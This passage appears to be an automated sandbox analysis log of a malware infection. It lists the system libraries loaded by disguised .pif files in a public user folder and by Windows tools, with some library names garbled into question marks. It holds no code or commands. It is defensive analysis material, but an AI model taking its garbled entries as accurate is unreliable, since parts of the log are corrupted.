Source: C:\Users\Public\rdha.pif | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: url.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ieframe.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: smartscreenps.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ieproxy.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: mssip32.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??????????.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ????.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???e???????????.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???e???????????.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??????????.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ????.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: tquery.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: cryptdll.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: spp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: vssapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: vsstrace.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: endpointdlp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: endpointdlp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: endpointdlp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: endpointdlp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: sppwmi.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: sppcext.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: winscard.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: devobj.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\esentutl.exe | Section loaded: esent.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\esentutl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\esentutl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: colorui.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: mscms.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: coloradapterclient.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: sti.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: devobj.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Users\Public\expha.pif | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Users\Public\expha.pif | Section loaded: cabinet.dll | |
Source: C:\Users\Public\expha.pif | Section loaded: cabinet.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wininet.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: pstorec.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: vaultcli.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wintypes.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: dpapi.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: pstorec.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\SysWOW64\recover.exe | Section loaded: cryptbase.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: certcli.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: cabinet.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: cryptui.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: certca.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: cryptsp.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: ncrypt.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: netapi32.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: ntdsapi.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: version.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: secur32.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: samcli.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: logoncli.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: dsrole.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: netutils.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: sspicli.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: ntasn1.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: uxtheme.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: profapi.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: certcli.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: cabinet.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: cryptui.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: ncrypt.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: netapi32.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: ntdsapi.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: certca.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: cryptsp.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: version.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: secur32.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: samcli.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: logoncli.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: dsrole.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: netutils.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: sspicli.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: ntasn1.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: uxtheme.dll | |
Source: C:\Users\Public\ghf.pif | Section loaded: profapi.dll | |
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\PING.EXE | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: zipfldr.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: propsys.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: uxtheme.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: windows.storage.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: wldp.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: kernel.appcore.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: profapi.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: edputil.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: urlmon.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: iertutil.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: srvcli.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: netutils.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: sspicli.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: wintypes.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: appresolver.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: bcp47langs.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: slc.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: userenv.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: sppc.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Users\Public\rdha.pif | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: version.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: uxtheme.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: url.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ieframe.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: iertutil.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: netapi32.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: userenv.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: winhttp.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: wkscli.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: netutils.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: windows.storage.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: wldp.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: kernel.appcore.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: propsys.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: amsi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: smartscreenps.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: winmm.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: wininet.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: sspicli.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: profapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: mswsock.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ieproxy.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: iphlpapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: msasn1.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: winnsi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: mssip32.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ????.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???e???????????.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???e???????????.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??????????.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ???.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ????.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: ??l.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: sppc.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: tquery.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: cryptdll.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: spp.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: vssapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: vsstrace.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: endpointdlp.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: endpointdlp.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: endpointdlp.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: endpointdlp.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: advapi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: sppwmi.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: slc.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: sppcext.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: winscard.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: devobj.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: cryptsp.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: rsaenh.dll | |
Source: C:\Users\Public\ANYDESK.PIF | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: dwmapi.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: atlthunk.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: mmdevapi.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: devobj.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: windowscodecs.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: textshaping.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: winmm.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: winmmbase.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: ksuser.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: avrt.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: audioses.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: powrprof.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: umpdc.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: msacm32.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: midimap.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: wininet.dll | |
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: iphlpapi.dll | |